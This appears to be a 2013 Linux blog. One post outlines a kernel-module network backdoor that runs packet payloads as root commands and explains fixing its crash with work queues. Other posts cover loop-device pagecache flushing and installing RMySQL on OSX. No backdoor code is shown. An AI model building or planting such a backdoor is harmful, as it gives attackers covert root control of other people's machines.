Monday, October 28, 2013

Linux kernel network backdoor

The ksplice blog has a very nice entry on hosting backdoors in hardware.
The quick summary of this backdoor is:
  1. Register a protocol handler for an unused IP protocol number .
  2. Call usermodhelper to execute the payload of the packet (skb->data).
  3. Remote system now executes any command that you send it as root.
Unfortunately, it looks like the code is either out of date and/or buggy. Attempting to modprobe the backdoor module generates the following kernel call trace:

Further investigations reveal that this is due to us calling a sleepy method from an atomic one... call_usermodhelper will eventually call wait_for_common which sleeps.  You do not want to sleep in an ISR routine.

The fix for this is to use a deferrable; we need to stop working in an interrupt context and schedule the non atomic work for future processing.

One possible solution is to use work queues for deferrable work. Here's an example implementation in github using work queues.

And here's an example session:

Friday, October 11, 2013

Linux: The pagecache and the loop back fs

Linux has a mechanism that allows you to create a block device that is backed by a file.  Most commonly, this is used to provide an encrpyted fs. All this is fine and dandy. However, you have to factor in that the Linux OS (And practically any other OS) will want to cache contents for block device in memory.
The reasoning here is. Accessing the contents of a file from a disk will cost you ~5ms. Rather than incur this cost on future reads, the OS caches the contents of the recently used file in a page cache. Future reads or writes to this file will hit the page cache which is orders of magnitude faster than your average disk.
This means that your writes will linger in memory until the your backing file's contents get evicted from the page cache. Using o_direct on files that are hosted within the loop backed fs won't help. You have to force pagecache evictions. The easiest way to do this is a call to fadvise and a sync to force pdflush to write your changes.

Here's an experiment:
I have 3 windows open.:
  • One running blktrace  which shows VFS activity.
  • One that has a oneshot dd.
  • One that has a bunch of shell commands that poke around the loop mounted fs.
The experiment is executed in the following order:
  1. An fadvise and a sync at the beginning to make sure the pagecache is clean and all writes are on the FS.
  2. We also print out a couple of stats from /proc/meminfo.
  3. We issue a dd call with direct I/O (oflag=direct).
  4. Print stats from /proc/meminfo and take a look at the backing file using debugfs.
  5. Show how much of the backing file is cached in the pagecache by using fincore.
  6. Evict the pagecache using the fadvise command from linux-ftools.
  7. Force a sync which wakes up pdflush to write out the dirty buffers.
  8. Run debugfs to take a peek at the backing fs again.
  9. Print out some more stats from meminfo.
Here's the script:
And the output generated:
The interesting bits to note here is that writes to a loop back filesystems in Linux are not guaranteed to be on disk until you evict the pagecache and force a sync.

If you are interested in further digging, here's debug output from:

Debugfs and dumpe2fs:

Thursday, October 10, 2013

Saturday, October 5, 2013


I ran into an issue installing RMySQL on OSX. I am using a R from brew and MySQL from the Oracle download page. Trying to install RMySQL would throw up this error

Turns out that the right solution is really easy. Set your MySQL home R env var, make sure that libmysqlclient can be found by R, configure the RMySQL package with the proper inc & lib dirs for MySQL